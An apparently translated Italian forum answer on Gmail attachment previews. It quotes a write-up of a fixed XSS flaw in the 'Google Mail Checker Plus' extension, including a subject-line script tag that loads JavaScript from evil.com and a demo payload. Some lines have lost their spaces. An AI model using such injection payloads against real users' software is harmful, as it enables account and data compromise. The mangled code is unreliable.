Quando apri un documento allegato su Gmail usando la modalità di anteprima (se posso dirlo), sei più sicuro perché è solo un'immagine dell'allegato ; puoi immaginare questa immagine come uno screenshot , voglio dire aprire il documento in questo modo ti rende più sicuro perché non include le funzionalità del documento originale :
Tuttavia,unafunzionalitàsimileèoffertada Google Mail Checker Plus estensione, prevede l'anteprima di un file in una finestra pop-up come lo hai descritto. L'anteprima del file in questo modo non ti espone a rischi , proprio come nella funzionalità sopra descritta, tuttavia (un caso che riflette il commento di @ shroeder alla tua domanda) Riproduco a te un esempio di vulnerabilità che è stato sfruttato in passato consentendo un attacco XSS:
Lets look on popular (18,368 installations per week) extension called
"Google Mail Checker Plus" [#]. This extension simply displays the
number of unread messages in your Gmail inbox, can make preview of
mail and supports desktop notifications.
.. figure::
http://oxdef.info/papers/ext/img/google_mail_checker_plus.png
Mail preview in popup of Google Mail Checker Plus
On preview we can see at least subject, from and piece of body of
letter. Ok, lets send to us self letter with subject like: ::
2"'><script src="http://evil.com/own.js"></script>
own.js
issimplejavascriptdemopayload:::
document.body.innerHTML='';img=newImage();img.src='http://evil.com/stallowned.jpg';document.body.appendChild(img);
Forthefirstweseesuchnotification:
..figure::http://oxdef.info/papers/ext/img/gmail_checker_xss_notificate.png
XSS in Google Mail Checker Plus notification part
For the second we click on extension's icon and see our worked payload
in popup window:
.. figure:: http://oxdef.info/papers/ext/img/gmail_checker_xss.png
XSS in Google Mail Checker Plus
It works! By the way this XSS has been already reported_ by Lostmon in
June 03, 2010 and fixed version of extension is available. Lostmon wrote that: "All extensions runs over his origin and no have way to
altered data
from extension or get sensitive data like , email account or password
etc.."
Let's discover this web vulnerability in context of this extension
to understand risks.
.. [#]
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe
.. _reported:
http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html
.. _notifications:
http://www.html5rocks.com/tutorials/notifications/quick/